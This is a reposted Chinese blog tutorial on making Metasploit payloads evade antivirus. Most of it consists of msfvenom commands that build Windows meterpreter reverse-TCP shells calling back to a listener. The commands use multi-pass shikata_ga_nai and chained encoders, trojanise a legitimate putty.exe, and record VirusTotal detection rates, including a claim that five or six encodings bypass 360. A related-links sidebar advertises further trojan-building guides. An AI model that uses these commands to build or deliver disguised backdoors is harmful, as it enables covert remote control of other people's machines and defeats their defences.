免杀的N种姿势-msf自免杀

最新推荐文章于 2024-07-03 18:59:45 发布
最新推荐文章于 2024-07-03 18:59:45 发布
阅读量907 收藏 6
点赞数
分类专栏: 病毒免杀 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51268003/article/details/123914139
版权

原文地址:远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)

本人只为技术交流和自我记录笔记 对于原文作者和团队充满膜拜 如有侵权请联系本人删除文章

前言:

本地的安全工具下载安装会影响玩LOL 所以实验嘛 用 在线查毒 就好啦(virustotal.com)

未处理的payload(VT查杀率53/69) 

msf自编码处理(VT查杀率51/69)

使用        msfvenom --list encoders 可查看所有编码器

评级最高的两个encoder为cmd/powershell_base64x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器了。

使用x86/shikata_ga_nai生成payload,参数-i为编码次数,我这里设置15次,并使用了-b参数去掉payload中的空字符。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15  -f exe -o payload2.exe

virustotal.com上查杀率为51/69

由于shikata_ga_nai编码技术是多态的,也就是说每次生成的payload文件都不一样,有时生成的文件会被查杀,有时却不会。当然这个也和编码次数有一定关系,编码次数好像超过70次就经常生成出错,但是编码次数多并不代表免杀能力强。

msf自捆绑免杀(VT查杀率39/69)

在生成payload时可以使用捆绑功能,使用msfvenom的-x参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x后面跟对应文件路径就可以。

我这里使用一个正规的putty.exe作为被捆绑测试软件。

生成payload命令如下

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333  -x putty.exe  -f exe -o payload3.exe

生成的两个文件对比,大小完全一样。
virustotal.com上查杀率为39/69

另外,能否免杀也和你选的被捆绑exe有一定关系,可以选微软的一些工具作为模板exe程序。

msf自捆绑+编码(VT查杀率35/69)

将上面的编码和捆绑两种方法结合一下进行尝试

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe  -i 15

可修改-i编码次数,编码次数越多,生成的payload越可能免杀,经测试,编码5次和6次可免杀360。

virustotal.com上查杀率为35/69

msfvenom多重编码(VT查杀率45/70)

msfvenom的encoder编码器可以对payload进行一定程度免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同编码器反复编码进行混淆。

如下命令,使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着来10次的alpha_upper编码,再来10次的countdown编码,最后才生成以putty.exe为模板的可执行文件。

msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x

还有这种更多重编码姿势

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.74.133 LPORT=5110 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > payload6.exe

virustotal.com上查杀率为45/70,编码多了,免杀率居然降低了。。。尴尬。。。

 经过测试,发现使用的编码类型越多,免杀率可能会降低,猜测是因为各种编码引入了更多的特征码。同时生成的payload也很可能无法正常执行,这个也和被捆绑程序有一定关联。

by不会写代码
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过Python实现Payload分离免杀过程详解
09-16
### 通过Python实现Payload分离免杀过程详解 在网络安全领域,Payload分离技术是一常见的方法,用于提高恶意软件的隐蔽性和生存能力。本文旨在详细介绍如何利用Python实现Payload的分离与免杀,通过具体示例帮助...
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
【CTF】【渗透】【msf】三、绕过杀毒软件技巧
weixin_45720193的博客
09-28 1716
将demo9999.exe关闭后,拖进Themida进行加壳。生成下面加壳成功的文件,即可避免火绒查杀。上述方法只能用于火绒。
免杀方法(三)msf加载器免杀
qq_56426046的博客
10-03 1040
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多平台,而且。
利用msfvenom制作windows木马及免杀
最新发布
aheyor的博客
07-03 712
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。原文链接:https://blog.csdn.net/qq_43332640/article/details/124072802。第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块。第二步:打开kali启动msfvenom,制作木马。第三步:木马捆绑,(主程序启动之后子程序随之启动)
免杀马学习(MSF捆绑编码)
红队是青春
02-03 518
仅供学习,入行前的笔记,关于免杀效果请勿喷
msf生成免杀木马
qq_56426046的博客
09-08 5558
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两方式。一是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
MSFconsole进阶】evasion免杀模块):免杀模块使用方法,相关设置
05-24 1619
【渗透工具】MSFconsole进阶:evasion免杀模块)
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心...
免杀学习记录--C++操作注册表编写开机自启程序
qq_42585535的博客
05-08 1408
设置开机自启成功!” << endl;else {cout << “设置开机自启失败!” << endl;return 0;主函数很简单,设置要自启的程序路径,也就是注册表键的值,然后执行修改注册表操作的函数,显示结果### 结语。
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7216
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
捆绑免杀无后门无木马
11-22
捆绑免杀无后门无木马,使用请参照详细说明,请别用于非法途径,否则后果自负
免杀的N姿势-msf
m0_51268003的博客
04-02 4061
msf是什么?百度一下你就知道 常规参数 -p / -payload 指定payload 支持自定义payload -l / -list 指出攻击模块(payloads、encoders、nops、all)的可用资源 -n / nopsled 为payload预设一个NOP滑动长度 //NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(1...
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
msf免杀
Xor0ne
03-12 1530
1、专业术语 渗透攻击(Exploit) 攻击载荷(Payload) Shellcode 模块(Module) 监听器(Listener) 2、msfvenom生成攻击载荷 msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。 参考链接:https://www.jianshu.com/p/204874fea1d3 Op...
Metasploit(msf)系列-木马免杀
chaojixiaojingang
10-10 9257
    木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
免杀知识汇总
goddemon
09-08 6835
veil工具基础使用+进阶 ①启动方法 ①cd /opt ② ls ③veil(运行veil即可) 使用方法 如 生成go语言的免杀马 use 16 set lhost ip set lport 端口 generate#(执行即可) ②结合cs进行免杀 实操(生成go语言的免杀马) ①cs使用生成一个go语言类型的payload ②use 17 ③需要的设置变量类(具体参数设置的含义) BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试) CLICKT
免杀后门之MSF&Veil-Evasion的完美结合
weixin_33749242的博客
10-14 700
  本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载: git clone https://www.github.com/Veil-Framework/Ve...
Metasploit实现木马生成、捆绑免杀
weixin_30545285的博客
12-06 1820
原创博客,转载请注出处! 我的公众号,正在建设中,欢迎关注: Meatsploit介绍 2018/01/03 更新 Metasploit是一款优秀的开源(!= 完全免费)渗透测试框架平台,在该平台下可以方便的实施渗透测试,Meatsploit具有繁多的接口、模块等等,甚至允许用户自己编写自己的模块使用。在Metasploit框架下可以方便的实现木马的生成、捆绑免杀。实验楼网站存在此节...
使用aspx实现payload免杀技术详解
课程提到了payload特征和行为分离免杀的思路,并给出了具体的MSF(Metasploit框架)配置步骤。通过设置payload、lhost、lport、stageencoder和其它参数,来构建隐蔽的通信通道,达到免杀的效果。" 在信息安全领域,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值